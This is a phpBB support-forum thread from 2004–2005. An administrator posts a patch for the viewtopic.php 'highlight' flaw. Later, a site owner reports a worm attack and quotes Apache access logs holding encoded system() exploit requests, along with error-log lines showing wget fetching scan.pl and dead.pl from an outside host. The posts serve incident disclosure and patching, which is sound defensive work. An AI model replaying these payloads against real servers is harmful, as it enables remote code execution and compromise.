 |
|
|
|
| Autor |
Nachricht |
stefan
Administrator
Anmeldungsdatum: 02.08.2002
Beiträge: 4735
Wohnort: Aachen
|
 Verfasst am:
Do 18 Nov, 2004 15:28 |
   |
A new Security issue was found in highlighting and you should urgently and quick update your viewtopic.php with this fix:
open viewtopic.php and find:
| Code: |
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars(urldecode($HTTP_GET_VARS['highlight']))));
for($i = 0; $i < sizeof($words); $i++)
{ |
and replace with:
| Code: |
//
// Was a highlight request part of the URI?
//
$highlight_match = $highlight = '';
if (isset($HTTP_GET_VARS['highlight']))
{
// Split words and phrases
$words = explode(' ', trim(htmlspecialchars($HTTP_GET_VARS['highlight'])));
for($i = 0; $i < sizeof($words); $i++)
{ |
Original Posting can be found here:
http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=240513
phpbb2.de was shortly taken last night with this one so you should urgently and quick update your System !!! I already have updated all downloadable phpBB2.x Versions here at phpbb2.de with this fix. |
_________________
Bye
Stefan
Styles Demo Forum :: Download Database :: phpBB2 Plus 1.5x Demo
phpBB2 Toplist :: International phpBB2 Support
Anwesend - Back in Business
Kein Support per PM - No Support via PM |
|
      |
|
Google
|
| Verfasst am:
|
|
|
|
|
Gast
|
| Verfasst am:
Fr 19 Nov, 2004 01:10 |
|
Was muss für phpBB2 Plus 1.52 beachtet werden ? Welche Hacks kollidieren ? |
_________________
--[[URL=http://www.phpbb2.de/phpBB/search.php]Suchfunktion[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=2837][README] Support auf phpBB2.de[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=3830]Richtiges Posten hier an Board[/URL]]-- |
|
|
|
Nina3Jungs
Support Team Member
Anmeldungsdatum: 18.06.2003
Beiträge: 4339
|
| Verfasst am:
Fr 19 Nov, 2004 01:11 |
|
Ich hab es drin, bis jetzt keine Probleme zu sehen. |
_________________
Die Klugheit eines Menschen lässt sich aus der Sorgfalt ermessen,
mit der er das Künftige bedenkt
Support nur im Forum, kein Support per PN oder Mail
Support only per forum, no support per PM or email |
|
|
|
Gast
|
| Verfasst am:
Fr 19 Nov, 2004 01:17 |
|
Ok - funzt bei mir auch ! 
Hab es nur durch Zufall gesehen - Newsletter folgt noch ? |
_________________
--[[URL=http://www.phpbb2.de/phpBB/search.php]Suchfunktion[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=2837][README] Support auf phpBB2.de[/URL]]--
--[[URL=http://forum.phpbb2.de/viewtopic.php?t=3830]Richtiges Posten hier an Board[/URL]]-- |
|
|
|
kovzol
phpBB2.de User
Anmeldungsdatum: 12.03.2005
Beiträge: 1
|
| Verfasst am:
Sa 12 März, 2005 19:41 |
 |
Hi, I'm Zoltan Kovacs from Hungary. I run some web sites, some of them run phpBB2 which is a great software (congrats!). I heard that some worm is attacking phpBB2 sites but today I'm also found by one. Here I provide some information about the facts to inform you urgently.
The worm came first from space.globehosting.net (209.59.164.114), then from 220.135.7.165 and later from several places. Here I provide the full list:
| Code: |
root@wmi:/srv/www> cd /var/log/apache2/
root@wmi:/var/log/apache2> cat access_log | grep highlight
209.59.164.114 - - [12/Mar/2005:11:13:20 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
220.135.7.165 - - [12/Mar/2005:11:57:15 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
81.169.166.77 - - [12/Mar/2005:12:33:58 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
82.154.158.203 - - [12/Mar/2005:13:03:20 +0100] "GET /~kovzol/phpBB2/profile.php?mode=register&highlight=%2527%252esystem(chr(105)%252echr(100)%252echr(59)%252echr(101)%252echr(99)%252echr(104)%252echr(111)%252echr(32)%252echr(119)%252echr(119)%252echr(119)%252echr(46)%252echr(97)%252echr(114)%252echr(112)%252echr(108)%252echr(104)%252echr(109)%252echr(100)%252echr(46)%252echr(122)%252echr(111)%252echr(114)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(32)%252echr(62)%252echr(32)%252echr(97)%252echr(114)%252echr(112)%252echr(108)%252echr(104)%252echr(109)%252echr(100)%252echr(46)%252echr(116)%252echr(120)%252echr(116)%252echr(59)%252echr(99)%252echr(97)%252echr(116)%252echr(32)%252echr(97)%252echr(114)%252echr(112)%252echr(108)%252echr(104)%252echr(109)%252echr(100)%252echr(46)%252echr(116)%252echr(120)%252echr(116))%252e%2527 HTTP/1.1" 200 15140 "-" "Mozilla/3.0 (compatible; Indy Library)"
66.66.44.241 - - [12/Mar/2005:13:59:23 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
81.201.129.212 - - [12/Mar/2005:15:00:07 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
207.46.98.129 - - [12/Mar/2005:15:04:53 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=12&highlight=&sid=6402f0d71e2ea70d12370a5597ac89f3 HTTP/1.0" 200 40521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
207.46.98.129 - - [12/Mar/2005:15:05:18 +0100] "GET /~kovzol/phpBB2/viewtopic.php?p=89&highlight=&sid=6402f0d71e2ea70d12370a5597ac89f3 HTTP/1.0" 200 40521 "-" "msnbot/1.0 (+http://search.msn.com/msnbot.htm)"
194.192.14.152 - - [12/Mar/2005:15:25:02 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
82.179.199.9 - - [12/Mar/2005:16:32:31 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29271 "-" "Mozilla/4.0"
217.22.231.77 - - [12/Mar/2005:18:12:50 +0100] "GET /~kovzol/phpBB2/viewtopic.php?t=6&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(32)%252Echr(45)%252Echr(101)%252Echr(32)%252Echr(34)%252Echr(112)%252Echr(114)%252Echr(105)%252Echr(110)%252Echr(116)%252Echr(32)%252Echr(113)%252Echr(40)%252Echr(106)%252Echr(83)%252Echr(86)%252Echr(111)%252Echr(119)%252Echr(77)%252Echr(115)%252Echr(100)%252Echr(41)%252Echr(34))%252E%2527 HTTP/1.0" 200 29255 "-" "Mozilla/4.0"
|
Here is the tail of my Apache error log:
| Code: |
--17:54:12-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 6) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--17:57:17-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try: 7) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--17:57:27-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 7) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... invalid token near line 1 (text was 'di')
failed: Connection timed out.
Retrying.
--18:00:33-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try: 8) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:00:43-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 8) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:03:50-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try: 9) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:04:00-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try: 9) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... [Sat Mar 12 18:05:28 2005] [error] [client 68.142.251.157] File does not exist: /srv/www/htdocs/robots.txt
failed: Connection timed out.
Retrying.
--18:07:08-- http://homepages.pathfinder.gr/ermisrol/fixing/dead.pl
(try:10) => `dead.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
--18:07:18-- http://homepages.pathfinder.gr/ermisrol/fixing/scan.pl
(try:10) => `scan.pl'
Connecting to homepages.pathfinder.gr[62.103.124.5]:80... failed: Connection timed out.
Retrying.
[Sat Mar 12 18:10:23 2005] [notice] caught SIGTERM, shutting down
[Sat Mar 12 18:10:27 2005] [warn] Init: Session Cache is not configured [hint: SSLSessionCache]
[Sat Mar 12 18:10:27 2005] [notice] suEXEC mechanism enabled (wrapper: /usr/sbin/suexec2)
[Sat Mar 12 18:10:28 2005] [notice] Apache/2.0.48 (Linux/SuSE) configured -- resuming normal operations
[Sat Mar 12 18:22:50 2005] [error] [client 64.140.49.66] File does not exist: /srv/www/htdocs/robots.txt
|
The worm here started a shell command line which downloaded the scan.pl and dead.pl files from http://homepages.pathfinder.gr/ermisrol/fixing/ and run them - anyone can also download these file easily until the author of this worm removes the files.
I don't want to deal much more with this issue. My fast fix was to stop the httpd server, fix the viewtopic.php file (which was described in www.phpbb2.de, I found it using the Google, "phpbb2 highlight") and restart the httpd server.
I found the worm because ps showed the shell command line exactly; dead.pl was a strange file name and I got suspicious.
I don't know if it worth to find the author in Greece, if you want to search him or her, it would be a great time to stop a mad person.
Yours sincerely, Zoltan |
|
|
 |
|
|
|
|
|
|
Nächstes Thema anzeigen
Vorheriges Thema anzeigen
Du kannst keine Beiträge in dieses Forum schreiben.
Du kannst auf Beiträge in diesem Forum nicht antworten.
Du kannst deine Beiträge in diesem Forum nicht bearbeiten.
Du kannst deine Beiträge in diesem Forum nicht löschen.
Du kannst an Umfragen in diesem Forum nicht mitmachen.
Du kannst Dateien in diesem Forum nicht posten
Du kannst Dateien in diesem Forum nicht herunterladen
|
|
| |
![[netclusive - internet broadcasting]](templates/fisubsilversh/images/phpbb2_logor_01.gif)
